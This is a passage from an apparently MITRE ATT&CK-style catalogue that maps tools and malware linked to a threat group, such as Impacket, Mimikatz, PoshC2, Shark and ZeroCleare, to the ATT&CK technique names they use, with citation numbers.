Screen Capture, Software Discovery: Security Software Discovery, Steal or Forge Kerberos Tickets: Kerberoasting, Steal or Forge Kerberos Tickets: Golden Ticket, Steal or Forge Kerberos Tickets: Silver Ticket, System Information Discovery, System Network Configuration Discovery, System Network Connections Discovery, System Owner/User Discovery, System Services: Service Execution, Trusted Developer Utilities Proxy Execution: MSBuild, Unsecured Credentials: Credentials In Files, Unsecured Credentials: Private Keys, Use Alternate Authentication Material: Pass the Hash, Video Capture, Web Service: Bidirectional Communication, Windows Management Instrumentation
S0095 ftp [8] Exfiltration Over Alternative Protocol: Exfiltration Over Unencrypted Non-C2 Protocol, Ingress Tool Transfer, Lateral Tool Transfer
S0357 Impacket [7] Adversary-in-the-Middle: LLMNR/NBT-NS Poisoning and SMB Relay, Network Sniffing, OS Credential Dumping: NTDS, OS Credential Dumping: LSASS Memory, OS Credential Dumping: Security Account Manager, OS Credential Dumping: LSA Secrets, Steal or Forge Kerberos Tickets: Kerberoasting, Steal or Forge Kerberos Tickets: Ccache Files, System Services: Service Execution, Windows Management Instrumentation
S0100 ipconfig [3][9] System Network Configuration Discovery
S1020 Kevin [2] Application Layer Protocol: DNS, Application Layer Protocol: Web Protocols, Command and Scripting Interpreter: Windows Command Shell, Data Encoding: Standard Encoding, Data from Local System, Data Obfuscation: Junk Data, Data Staged, Data Transfer Size Limits, Event Triggered Execution: Windows Management Instrumentation Event Subscription, Exfiltration Over C2 Channel, Fallback Channels, Hide Artifacts: Hidden Window, Indicator Removal: File Deletion, Ingress Tool Transfer, Masquerading: Rename System Utilities, Native API, Obfuscated Files or Information: Encrypted/Encoded File, Protocol Tunneling, System Information Discovery, System Network Configuration Discovery, Virtualization/Sandbox Evasion
S1015 Milan [2][4] Account Discovery: Local Account, Application Layer Protocol: DNS, Application Layer Protocol: Web Protocols, Command and Scripting Interpreter: Windows Command Shell, Data from Local System, Data Staged: Local Data Staging, Dynamic Resolution: Domain Generation Algorithms, Indicator Removal: File Deletion, Ingress Tool Transfer, Inter-Process Communication: Component Object Model, Masquerading, Masquerading: Double File Extension, Native API, Obfuscated Files or Information: Encrypted/Encoded File, Protocol Tunneling, Query Registry, Scheduled Task/Job: Scheduled Task, System Information Discovery, System Network Configuration Discovery, System Owner/User Discovery
S0002 Mimikatz [2] Access Token Manipulation: SID-History Injection, Account Manipulation, Boot or Logon Autostart Execution: Security Support Provider, Credentials from Password Stores, Credentials from Password Stores: Credentials from Web Browsers, Credentials from Password Stores: Windows Credential Manager, OS Credential Dumping: DCSync, OS Credential Dumping: Security Account Manager, OS Credential Dumping: LSASS Memory, OS Credential Dumping: LSA Secrets, Rogue Domain Controller, Steal or Forge Authentication Certificates, Steal or Forge Kerberos Tickets: Golden Ticket, Steal or Forge Kerberos Tickets: Silver Ticket, Unsecured Credentials: Private Keys, Use Alternate Authentication Material: Pass the Hash, Use Alternate Authentication Material: Pass the Ticket
S0104 netstat [2] System Network Connections Discovery
S0097 Ping [3] Remote System Discovery
S0378 PoshC2 [5] Abuse Elevation Control Mechanism: Bypass User Account Control, Access Token Manipulation: Create Process with Token, Access Token Manipulation, Account Discovery: Local Account, Account Discovery: Domain Account, Adversary-in-the-Middle: LLMNR/NBT-NS Poisoning and SMB Relay, Application Layer Protocol: Web Protocols, Archive Collected Data: Archive via Utility, Automated Collection, Brute Force, Credentials from Password Stores, Domain Trust Discovery, Event Triggered Execution: Windows Management Instrumentation Event Subscription, Exploitation for Privilege Escalation, Exploitation of Remote Services, File and Directory Discovery, Input Capture: Keylogging, Network Service Discovery, Network Sniffing, OS Credential Dumping: LSASS Memory, Password Policy Discovery, Permission Groups Discovery: Local Groups, Process Injection, Proxy, System Information Discovery, System Network Configuration Discovery, System Network Connections Discovery, System Service Discovery, System Services: Service Execution, Unsecured Credentials: Credentials In Files, Use Alternate Authentication Material: Pass the Hash, Windows Management Instrumentation
S0364 RawDisk [8][7] Data Destruction, Disk Wipe: Disk Structure Wipe, Disk Wipe: Disk Content Wipe
S1150 ROADSWEEP [6] Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder, Command and Scripting Interpreter: Windows Command Shell, Data Encrypted for Impact, Defacement: Internal Defacement, Deobfuscate/Decode Files or Information, Execution Guardrails, File and Directory Discovery, Indicator Removal: File Deletion, Inhibit System Recovery, Inter-Process Communication, Obfuscated Files or Information: Encrypted/Encoded File, Peripheral Device Discovery, Service Stop, Subvert Trust Controls: Code Signing, System Information Discovery
S1019 Shark [2][4] Application Layer Protocol: Web Protocols, Application Layer Protocol: DNS, Command and Scripting Interpreter: Windows Command Shell, Data from Local System, Data Staged, Deobfuscate/Decode Files or Information, Dynamic Resolution: Domain Generation Algorithms, Exfiltration Over C2 Channel, Fallback Channels, Indicator Removal: File Deletion, Ingress Tool Transfer, Masquerading: Match Legitimate Name or Location, Obfuscated Files or Information: Encrypted/Encoded File, Query Registry, Scheduled Transfer, System Information Discovery, Virtualization/Sandbox Evasion: System Checks
S1151 ZeroCleare [8][7] Command and Scripting Interpreter, Command and Scripting Interpreter: PowerShell, Disk Wipe: Disk Structure Wipe, Exploitation for Privilege Escalation, Indicator Removal: File Deletion, Native API, Subvert Trust Controls: Code Signing, System Information Discovery

References